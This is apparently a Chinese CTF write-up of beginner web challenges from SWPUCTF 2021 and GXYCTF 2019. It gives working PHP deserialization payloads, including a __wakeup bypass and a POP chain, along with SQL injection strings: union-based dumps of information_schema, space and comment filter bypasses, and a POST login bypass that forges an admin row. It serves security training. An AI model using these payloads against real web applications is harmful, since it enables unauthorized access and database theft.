[SWPUCTF 2021 新生赛]ez_unserialize

这道题目考察php反序列化的知识点

打开题目，发现没有提示，我们试着用御剑扫描目录文件，发现存在robots.txt的文件

接着访问这个文件，发现是一段php反序列化代码，我们需要进行序列化的转换

简单的构造exp代码如下，在末尾那里

<?php
  error_reporting(0);
show_source("cl45s.php");

class wllm{

  public $admin;
  public $passwd;

  public function __construct(){
    $this->admin ="user";
    $this->passwd = "123456";
  }

  public function __destruct(){
    if($this->admin === "admin" && $this->passwd === "ctf"){
      include("flag.php");
      echo $flag;
    }else{
      echo $this->admin;
      echo $this->passwd;
      echo "Just a bit more!";
    }
  }
}
$a=new wllm();
$a->admin = "admin";
$a->passwd = "ctf";
$s=serialize($a);
echo $s;
?>

运行即可得到

O:4:"wllm":2:{s:5:"admin";s:5:"admin";s:6:"passwd";s:3:"ctf";} 

我们再进行paylaod,即可得到flag

?p=O:4:"wllm":2:{s:5:"admin";s:5:"admin";s:6:"passwd";s:3:"ctf";} 

[SWPUCTF 2021 新生赛]no_wakeup

这道题目考察php反序列化的知识点以及__wakeup函数的绕过

按照提示点击即可获得下面php代码，同样也是要将代码进行序列化转换，但是这道题目出现了__wakeup函数，我们需要进行绕过

我们只需要像上面题目构造exp即可，在末尾那里

<?php

header("Content-type:text/html;charset=utf-8");
error_reporting(0);
show_source("class.php");

class HaHaHa{


        public $admin;
        public $passwd;

        public function __construct(){
            $this->admin ="user";
            $this->passwd = "123456";
        }

        public function __wakeup(){
            $this->passwd = sha1($this->passwd);
        }

        public function __destruct(){
            if($this->admin === "admin" && $this->passwd === "wllm"){
                include("flag.php");
                echo $flag;
            }else{
                echo $this->passwd;
                echo "No wake up";
            }
        }
    }

// $Letmeseesee = $_GET['p'];
// unserialize($Letmeseesee);
$a = new HaHaHa();
$a->admin = admin;
$a->passwd = wllm;
echo serialize($a)

?>

构造完运行可以得到如下

O:6:"HaHaHa":2:{s:5:"admin";s:5:"admin";s:6:"passwd";s:4:"wllm";} 

但是呢，我们如果直接对此进行payload是不可以的，因为还存在着wakeup函数，绕过它非常简单，我们只需要将属性的个数值修改即可，2--->>>3/4/5等等

构造payload如下

?p=O:6:"HaHaHa":3:{s:5:"admin";s:5:"admin";s:6:"passwd";s:4:"wllm";}

[SWPUCTF 2021 新生赛]pop 

这道题目依旧考察php反序列化的知识点，但这道题目中出现了toString的魔术引号，我们需要知道它的用法

也就是说我们要了解清楚代码的运行顺序 ，创建输出对象后就会自动调用toString方法

首先观察一下整段代码，再结合上面总结的魔术方法分析一下，w44m类里面的Getflag函数可以用来读取flag，因此就将它作为这条链子的尾部。

再想一下如何去调用这个函数，看下面这段代码。这段代码中，$this->w00m->{$this->w22m}();会调用函数，所以只需要给$w00m赋一个w44m类，然后再给w22m赋一个Getflag就能成功调用该函数。 

再考虑一下如何调用这个w33m类呢？？上面写过__toString()这个方法会在一个对象被当作字符串时被调用，于是我们就能看到下面w22m这个类里面的echo函数。我们只要给w00m赋一个w33m类，就能调用。

到了这里，析构函数__destruct，会在对象被销毁时调用，所以我们已经摸到这条链子的头了，捋一下这条链子。 

 w22m::__destruct()->w33m::__toString()->w44m::Getflag()

然后我们构造一下exp代码
这里注意，因为admin和passwd是私有类和被保护的类，所以没办法在该类的外部赋值或引用，所以要在类中提前赋值 

<?php

error_reporting(0);
show_source("index.php");

class w44m{

    private $admin = 'w44m';
    protected $passwd = '08067';

}

class w22m{
    public $w00m;
   
}

class w33m{
    public $w00m;
    public $w22m;
   
}

// $w00m = $_GET['w00m'];
// unserialize($w00m);
$a=new w22m;
$a->w00m=new w33m;
$a->w00m->w00m=new w44m;
$a->w00m->w22m='Getflag';
echo urlencode(serialize($a));

?>

运行成功之后可以得到exp

O%3A4%3A"w22m"%3A1%3A%7Bs%3A4%3A"w00m"%3BO%3A4%3A"w33m"%3A2%3A%7Bs%3A4%3A"w00m"%3BO%3A4%3A"w44m"%3A2%3A%7Bs%3A11%3A"%00w44m%00admin"%3Bs%3A4%3A"w44m"%3Bs%3A9%3A"%00%2A%00passwd"%3Bs%3A5%3A"08067"%3B%7Ds%3A4%3A"w22m"%3Bs%3A7%3A"Getflag"%3B%7D%7D 

接着构造payload如下：

?w00m=O%3A4%3A"w22m"%3A1%3A%7Bs%3A4%3A"w00m"%3BO%3A4%3A"w33m"%3A2%3A%7Bs%3A4%3A"w00m"%3BO%3A4%3A"w44m"%3A2%3A%7Bs%3A11%3A"%00w44m%00admin"%3Bs%3A4%3A"w44m"%3Bs%3A9%3A"%00%2A%00passwd"%3Bs%3A5%3A"08067"%3B%7Ds%3A4%3A"w22m"%3Bs%3A7%3A"Getflag"%3B%7D%7D 

[SWPUCTF 2021 新生赛]easy_sql 

这道题目考察sql注入中的联合注入

首先题目地址给出提示参数是wllm，尝试用数字型注入，发现没有正常回显，用单引号注入提示报错语句，从这里可以得知这道题目是字符型的单引号注入，接着用order by判断字段数

?wllm=1' order by 3--+      //当数字为4时，出现报错，可以得知为3个字段数

?wllm=-1' union select 1,2,3--+   //判断回显点，题目出现2和3的提示，说明从2和3中出现回显点

?wllm=-1' union select 1,2,database()--+       //爆出数据库为test_db

?wllm=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test_db'--+           //爆出表名test_tb和users

?wllm=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='test_db' and table_name='users'--+      //从users表中爆出字段名id，username，password，没有获得我们想要的flag，换张表试试

?wllm=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='test_db' and table_name='test_tb'--+    //从test_tb表中获取到flag字段

?wllm=-1' union select 1,2,group_concat(flag) from test_tb--+    //获取flag字段内容

[SWPUCTF 2021 新生赛]sql 

这道题目考察的知识点是sql注入的绕过,空格绕过/**/，注释符绕过%23，等于号=的绕过like，and的绕过，截取函数substr的绕过mid

首先尝试数字型注入，发现没有出现报错界面，试试字符单引号型，发现出现报错语句，此时我们的注释符要替换成url编码形式绕过，以及空格的绕过

?wllm=1'/**/order/**/by/**/3%23               //当数字出现4时报错，说明字段数为3

?wllm=-1'union/**/select/**/1,2,3%23      //题目出现2和3的提示，说明在2和3中出现回显点

?wllm=-1'union/**/select/**/1,2,group_concat(database())%23     //爆出库名test_db

?wllm=-1'union/**/select/**/1,2,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema/**/like("test_db")%23     //出现表名LTLT_flag和users，猜测flag在LTLT_flag表中

?wllm=-1'union/**/select/**/1,2,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name/**/like("LTLT_flag")%23

//爆出字段名id和flag，这里绕过了and，因此只从表中获取到字段名

?wllm=-1'union/**/select/**/1,2,group_concat(flag)/**/from/**/LTLT_flag%23   //这里只能获取到flag的一部分NSSCTF{6bef6596-477a，此时需要用到截取函数截取后面的部分

?wllm=-1'union/**/select/**/1,2,mid(group_concat(flag),1,20)/**/from/**/LTLT_flag%23

//可以得到NSSCTF{6bef6596-477a

?wllm=-1'union/**/select/**/1,2,mid(group_concat(flag),21,20)/**/from/**/LTLT_flag%23

//可以得到-4360-a43c-252e2f15c

?wllm=-1'union/**/select/**/1,2,mid(group_concat(flag),41,20)/**/from/**/LTLT_flag%23

//可以得到70e}

拼接起来可以得到flagNSSCTF{6bef6596-477a-4360-a43c-252e2f15c70e}

[GXYCTF 2019]BabySqli 

这道题目考察POST方式的注入，并且带有过滤，我们同样需要进行绕过

先随便输入用户名和密码，配合Burpsuite抓包可以得到如下：得知为POST注入

1.判断注入点：在name上假设为注入点，尝试用数字型，没有显示报错语句，再试试字符单引号型出现报错语句，得知为字符型单引号的注入

 2.判断注入点：我们通过抓包可以得到

容易得知上面字符为base32加密，我们先进行解密，再得到base64加密字符，再用base64解密可以得到

select * from user where username = '$name' 

可以得知注入点为name，并且为单引号型注入 

POST型注入内容：

name=1' group by 3--+&pw=1            //这里可以得到数字4出现报错，得知有3个字段，并且在这里需要绕过order，用group即可绕过

这里用到弱口令猜测的方法 ：猜测username为admin，而密码未知，在表中正常存在id，username，passwd这三个字段，但是我们不知道它们正确的顺序，并且passwd是经过md5加密的

接着我们判断admin在表中的哪个位置

name=-1' union select 'admin',2,3--+&pw=1      //假设在第一个字段，出现wrong user!

name=-1' union select 1,'admin',3--+&pw=1      //假设在第二个字段，出现wrong pass!

name=-1' union select 1,2,'admin'--+&pw=1      //假设在第三个字段，出现wrong user!

可以得知admin在第二个字段，第三个字段就为password

接着我们假设password为123，我们需要让123经过md5加密，再进行注入,如下

name=-1'union select 1,'admin','202cb962ac59075b964b07152d234b70'#&pw=123

这里我们注入完成之后，数据库如下 

 

这道题目需要了解数据库的字段格式，相对于我来说，这道题目也是新的解题方式